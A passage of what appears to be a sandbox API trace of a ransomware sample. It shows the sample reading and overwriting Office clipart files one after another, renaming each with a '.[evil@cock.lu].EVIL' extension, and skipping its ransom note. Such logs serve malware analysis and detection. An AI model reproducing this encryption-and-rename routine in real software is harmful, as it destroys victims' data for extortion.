??_V@YAXPEAX@Z () returned 0x1 [0119.696] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01628_.WMF", dwFileAttributes=0x200) returned 0 [0119.696] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0119.696] wcsstr (_Str="DD01629_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0119.696] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01629_.WMF") returned 69 [0119.696] wcscmp (_String1="DD01629_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0119.696] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="DD01629_.WMF") returned 0x0 [0119.696] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01629_.WMF") returned 0x45 [0119.696] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01629_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01629_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0119.698] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x244, lpOverlapped=0x0) returned 1 [0119.701] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0119.701] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0119.701] _errno () returned 0x84b1160840 [0119.701] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.701] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x260, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x260, lpOverlapped=0x0) returned 1 [0119.701] CloseHandle (hObject=0x1a8) returned 1 [0119.701] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01629_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0119.702] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0119.702] __uncaught_exception () returned 0x84b1160800 [0119.702] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0119.718] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01629_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01629_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01629_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01629_.wmf.[evil@cock.lu].evil")) returned 1 [0119.719] ??_V@YAXPEAX@Z () returned 0x1 [0119.722] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01629_.WMF", dwFileAttributes=0x200) returned 0 [0119.722] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0119.722] wcsstr (_Str="DD01630_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0119.722] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01630_.WMF") returned 69 [0119.722] wcscmp (_String1="DD01630_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0119.722] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="DD01630_.WMF") returned 0x0 [0119.722] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01630_.WMF") returned 0x45 [0119.722] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01630_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01630_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0119.724] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x128, lpOverlapped=0x0) returned 1 [0119.726] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0119.726] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0119.726] _errno () returned 0x84b1160840 [0119.726] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.727] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x140, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x140, lpOverlapped=0x0) returned 1 [0119.727] CloseHandle (hObject=0x1a8) returned 1 [0119.727] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01630_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0119.727] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0119.727] __uncaught_exception () returned 0x84b1160800 [0119.727] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0119.741] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01630_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01630_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01630_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01630_.wmf.[evil@cock.lu].evil")) returned 1 [0119.741] ??_V@YAXPEAX@Z () returned 0x1 [0119.744] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01630_.WMF", dwFileAttributes=0x200) returned 0 [0119.744] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0119.744] wcsstr (_Str="DD01631_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0119.744] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01631_.WMF") returned 69 [0119.744] wcscmp (_String1="DD01631_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0119.744] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="DD01631_.WMF") returned 0x0 [0119.744] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01631_.WMF") returned 0x45 [0119.744] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01631_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01631_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0119.746] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x228, lpOverlapped=0x0) returned 1 [0119.748] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0119.748] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0119.748] _errno () returned 0x84b1160840 [0119.748] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.748] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x240, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x240, lpOverlapped=0x0) returned 1 [0119.748] CloseHandle (hObject=0x1a8) returned 1 [0119.748] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01631_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0119.748] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0119.748] __uncaught_exception () returned 0x84b1160800 [0119.748] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0119.841] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01631_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01631_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01631_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01631_.wmf.[evil@cock.lu].evil")) returned 1 [0119.842] ??_V@YAXPEAX@Z () returned 0x1 [0119.845] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01631_.WMF", dwFileAttributes=0x200) returned 0 [0119.845] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0119.845] wcsstr (_Str="DD01761_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0119.845] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01761_.WMF") returned 69 [0119.845] wcscmp (_String1="DD01761_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0119.845] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="DD01761_.WMF") returned 0x0 [0119.845] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01761_.WMF") returned 0x45 [0119.845] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01761_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01761_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0119.847] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1034, lpOverlapped=0x0) returned 1 [0119.849] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0119.849] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0119.849] _errno () returned 0x84b1160840 [0119.849] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.849] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x1040, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1040, lpOverlapped=0x0) returned 1 [0119.850] CloseHandle (hObject=0x1a8) returned 1 [0119.850] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01761_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0119.850] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0119.850] __uncaught_exception () returned 0x84b1160800 [0119.850] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0119.850] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01761_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01761_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01761_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01761_.wmf.[evil@cock.lu].evil")) returned 1 [0119.851] ??_V@YAXPEAX@Z () returned 0x1 [0119.854] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01761_.WMF", dwFileAttributes=0x200) returned 0 [0119.854] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0119.854] wcsstr (_Str="DD01772_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0119.854] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01772_.WMF") returned 69 [0119.854] wcscmp (_String1="DD01772_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0119.854] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="DD01772_.WMF") returned 0x0 [0119.854] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01772_.WMF") returned 0x45 [0119.854] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01772_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01772_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0119.856] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x8fc, lpOverlapped=0x0) returned 1 [0119.883] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0119.883] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0119.883] _errno () returned 0x84b1160840 [0119.883] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.883] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x900, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x900, lpOverlapped=0x0) returned 1 [0119.883] CloseHandle (hObject=0x1a8) returned 1 [0119.883] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01772_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0119.884] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0119.884] __uncaught_exception () returned 0x84b1160800 [0119.884] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0119.884] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01772_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01772_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01772_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01772_.wmf.[evil@cock.lu].evil")) returned 1 [0119.885] ??_V@YAXPEAX@Z () returned 0x1 [0119.888] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01772_.WMF", dwFileAttributes=0x200) returned 0 [0119.889] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0119.889] wcsstr (_Str="DD01793_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0119.889] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01793_.WMF") returned 69 [0119.889] wcscmp (_String1="DD01793_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0119.889] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="DD01793_.WMF") returned 0x0 [0119.889] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01793_.WMF") returned 0x45 [0119.889] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01793_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01793_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0119.891] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xcb4, lpOverlapped=0x0) returned 1 [0119.907] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0119.907] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0119.908] _errno () returned 0x84b1160840 [0119.908] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.908] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0xcc0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xcc0, lpOverlapped=0x0) returned 1 [0119.908] CloseHandle (hObject=0x1a8) returned 1 [0119.908] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01793_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0119.908] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0119.908] __uncaught_exception () returned 0x84b1160800 [0119.908] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0119.909] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01793_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01793_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01793_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01793_.wmf.[evil@cock.lu].evil")) returned 1 [0119.910] ??_V@YAXPEAX@Z () returned 0x1 [0119.913] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01793_.WMF", dwFileAttributes=0x200) returned 0 [0119.913] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0119.913] wcsstr (_Str="EAST_01.MID", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0119.913] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EAST_01.MID") returned 68 [0119.913] wcscmp (_String1="EAST_01.MID", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0119.913] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="EAST_01.MID") returned 0x0 [0119.913] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EAST_01.MID") returned 0x44 [0119.913] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EAST_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\east_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0119.915] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1815, lpOverlapped=0x0) returned 1 [0119.917] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0119.917] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0119.918] _errno () returned 0x84b1160840 [0119.918] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.918] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x1820, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1820, lpOverlapped=0x0) returned 1 [0119.918] CloseHandle (hObject=0x1a8) returned 1 [0119.918] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EAST_01.MID", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0119.918] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0119.918] __uncaught_exception () returned 0x84b1160800 [0119.918] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0119.918] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EAST_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\east_01.mid"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EAST_01.MID.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\east_01.mid.[evil@cock.lu].evil")) returned 1 [0119.919] ??_V@YAXPEAX@Z () returned 0x1 [0119.921] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EAST_01.MID", dwFileAttributes=0x200) returned 0 [0119.922] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0119.922] wcsstr (_Str="ED00010_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0119.922] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00010_.WMF") returned 69 [0119.922] wcscmp (_String1="ED00010_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0119.922] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="ED00010_.WMF") returned 0x0 [0119.922] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00010_.WMF") returned 0x45 [0119.922] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00010_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ed00010_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0119.924] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x566, lpOverlapped=0x0) returned 1 [0119.926] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0119.926] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0119.926] _errno () returned 0x84b1160840 [0119.926] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.926] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x580, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x580, lpOverlapped=0x0) returned 1 [0119.926] CloseHandle (hObject=0x1a8) returned 1 [0119.926] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00010_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0119.927] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0119.927] __uncaught_exception () returned 0x84b1160800 [0119.927] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0119.927] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00010_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ed00010_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00010_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ed00010_.wmf.[evil@cock.lu].evil")) returned 1 [0119.927] ??_V@YAXPEAX@Z () returned 0x1 [0119.930] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00010_.WMF", dwFileAttributes=0x200) returned 0 [0119.930] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0119.930] wcsstr (_Str="ED00019_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0119.930] _snwprintf (in: _Dest=0x84b0fddc50, 